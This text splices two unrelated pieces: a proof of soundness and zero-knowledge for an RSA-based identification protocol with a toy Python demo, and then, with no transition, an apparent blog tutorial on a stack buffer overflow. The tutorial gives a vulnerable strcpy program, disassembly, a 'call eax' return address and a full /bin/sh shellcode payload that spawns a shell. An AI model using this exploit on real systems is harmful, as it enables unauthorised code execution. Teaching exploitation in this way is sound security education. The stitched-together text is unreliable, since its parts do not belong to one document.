**Soundness:** If Alice can have her identification accepted by Bob no matter which challenge he sends her, then she must be Alice. Suppose that, for a fixed value of $r$, Alice can give accepted answers $t_1,t_2$ respectively to two distinct challenges $c_1,c_2$. Then we have

\[ I^{c_1}t_1^e = T = I^{c_2}t_2^e, \]

and it follows that

\[ I^{c_1-c_2} = (t_2t_1^{-1})^e. \]

Since we assumed that $e$ is prime and we have $|c_1-c_2| < e$, $c_1-c_2$ and $e$ are relatively prime, and we can obtain a Bézout identity:
\[ a(c_1-c_2)+be = 1. \]
If we now let
\[ z = I^b(t_2t_1^{-1})^a, \]
we obtain
\[ \begin{align*}
z^e
&= I^{be}(t_2t_1^{-1})^{ae} \\
&= I^{be}I^{a(c_1-c_2)} \\
&= I^{be+a(c_1-c_2)} \\
&= I.
\end{align*} \]
This means that if Alice can successfully answer both challenges, then she must know an $e$th root $z$ of $I$ in $\mathbf{Z}_n^*$. The RSA assumption states that this is not possible in any reasonable time with non-negligible probability without knowing the prime factors of $n$. Since Alice does not know them, she must have obtained an $e$th root of $I$ from someone who does, and the only person who does is Trent. So the $e$th root of $I$ is just (the inverse of) her secret $B$, and since of course Trent will only give Alice the secret $B$ corresponding to an identity $I$ if $I$ really is Alice's identity, we see that Alice must be who she claims to be.
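This extraction is easy to play out concretely. The following toy sketch in plain Python (tiny illustrative parameters; pow(x, -1, n) needs Python 3.8+) builds two honest transcripts sharing the same $r$ and recovers an $e$th root of $I$ from them via the Bézout identity:

```python
# Toy parameters, illustrative only.
p, q, e = 11, 17, 3
n, phi = p * q, (p - 1) * (q - 1)
d = pow(e, -1, phi)
I = 42
B = pow(pow(I, d, n), -1, n)     # Alice's secret

def egcd(x, y):
    # Extended Euclid: returns (g, a, b) with a*x + b*y = g.
    if y == 0:
        return x, 1, 0
    g, u, v = egcd(y, x % y)
    return g, v, u - (x // y) * v

# Two honest, accepted transcripts sharing the same commitment r:
r = 5
T = pow(r, e, n)
c1, c2 = 0, 2                    # two distinct challenges
t1 = (r * pow(B, c1, n)) % n
t2 = (r * pow(B, c2, n)) % n

# Bezout identity a*(c1-c2) + b*e = 1 (they are coprime since e is
# prime and 0 < |c1-c2| < e); then z = I^b (t2/t1)^a.
g, a, b = egcd(c1 - c2, e)
z = (pow(I, b, n) * pow((t2 * pow(t1, -1, n)) % n, a, n)) % n
print(pow(z, e, n) == I)         # z is an e-th root of I: True
```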

**Zero-knowledge:** What information does Bob obtain from the protocol? He first obtains $T = r^e$ for an $r$ randomly chosen by Alice. Since $e$ is public, Bob could just as well have generated a random $r$ himself, so he does not learn anything new. Then he obtains $t = rB^c$, and since $r$ is random and Bob cannot recover $r$ from $T$ (by the RSA assumption), $t$ looks random to him as well. So Bob does not learn anything about $B$.

We saw in the previous post what a shellcode was, and studied one in detail. We also discussed the basic idea of what we want to do with it: write it in memory, and have the processor execute it. The first part is easy: since a shellcode is just a string of bytes, we can pass it to a vulnerable program like we would any other string. The second part is where the challenge is. In this post, we will see one way to do it, which is very simple but works only under very favourable conditions.

The program we will exploit is as follows:

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void vuln(char *s)
{
    char buffer[64];
    strcpy(buffer, s);
}

int main(int argc, char **argv)
{
    if (argc == 1) {
        fprintf(stderr, "Enter a string!\n");
        exit(EXIT_FAILURE);
    }
    vuln(argv[1]);
}
```

As you might have guessed, we will first write our shellcode in buffer, then some random data until we reach the return address, and then overwrite the return address with something that will make the processor run our shellcode. And again the challenge is what exactly to write as a return address.

After disassembling the program, we make two key observations. First, from the code of vuln():

```
$ gcc -m32 -std=c99 -O0 -fno-stack-protector -z execstack -pedantic -Wall -Wextra -o vuln4 vuln4.c
$ objdump -d vuln4 | nl
[...]
   117  08048464 <vuln>:
   118   8048464:     55                      push   ebp
   119   8048465:     89 e5                   mov    ebp,esp
   120   8048467:     83 ec 58                sub    esp,0x58
   121   804846a:     8b 45 08                mov    eax,DWORD PTR [ebp+0x8]
   122   804846d:     89 44 24 04             mov    DWORD PTR [esp+0x4],eax
   123   8048471:     8d 45 b8                lea    eax,[ebp-0x48]
   124   8048474:     89 04 24                mov    DWORD PTR [esp],eax
   125   8048477:     e8 f4 fe ff ff          call   8048370 <strcpy@plt>
   126   804847c:     c9                      leave
   127   804847d:     c3                      ret
[...]
```

we see that at the end of the execution of the function, the register eax will contain the address of buffer. This gives us an idea: if, somewhere in the program, there was an instruction call eax or jmp eax, then we could write the address of that instruction as our return address. The processor would then jump to it, which would cause it to jump right on our shellcode. And sure enough:

```
$ objdump -d vuln4 | grep "call.*eax"
 8048418:       ff 14 85 1c 9f 04 08    call   DWORD PTR [eax*4+0x8049f1c]
 804845f:       ff d0                   call   eax
 804857b:       ff d0                   call   eax
```

so we will write 0x0804845f as our return address. The rest is routine, and we obtain

```
$ ./vuln4 $(perl -e 'print "\xeb\x18\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x8d\x1e\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" . "1"x38 . "\x5f\x84\x04\x08"')
sh-4.2$
```
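The payload can equally be assembled in Python; in this sketch the shellcode is the 38-byte one from the previous post, and 0x0804845f is the address of the call eax instruction found above:

```python
import struct

# The 38-byte execve("/bin/sh") shellcode from the previous post.
shellcode = (b"\xeb\x18\x5e\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c"
             b"\xb0\x0b\x8d\x1e\x8d\x4e\x08\x8d\x56\x0c\xcd\x80"
             b"\xe8\xe3\xff\xff\xff/bin/sh")

CALL_EAX = 0x0804845f                   # address of the "call eax" instruction

payload  = shellcode                    # lands at the start of buffer
payload += b"1" * (76 - len(shellcode)) # filler up to the return address
payload += struct.pack("<I", CALL_EAX)  # ret jumps to "call eax"

print(len(payload))  # 80
```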